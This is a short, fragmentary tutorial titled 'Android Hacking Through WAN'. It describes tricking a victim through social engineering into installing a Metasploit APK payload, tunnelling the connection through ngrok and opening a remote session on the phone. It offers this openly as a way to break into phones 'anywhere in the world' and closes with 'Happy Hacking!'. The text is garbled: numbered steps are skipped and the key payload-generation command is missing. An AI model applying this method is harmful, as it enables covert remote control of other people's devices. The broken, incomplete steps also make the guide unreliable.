Android Hacking Through WAN
Android Hacking Through WAN
Android phones are very easy to break into if the victim can be Social Engineered into doing so.
If you use Kali, you may have done this but probably in your own network. This guide shows
you how to do so but over HTTP tunneling to a phone anywhere in the world.
unzip "/path-to-ngrok.zip"
Step 3: - Sign Up
The sign-up page can be found here: https://ngrok.com/signup. Then run the command to
activate your AUTH Token
ping 0.tcp.ngrok.io
Next, we must generate a Metasploit APK Payload with the following command
msfconsole
Step 7: - Configure the Listener
To start the payload listener, we must now enter these commands:
sessions
sessions 1
help
Happy Hacking!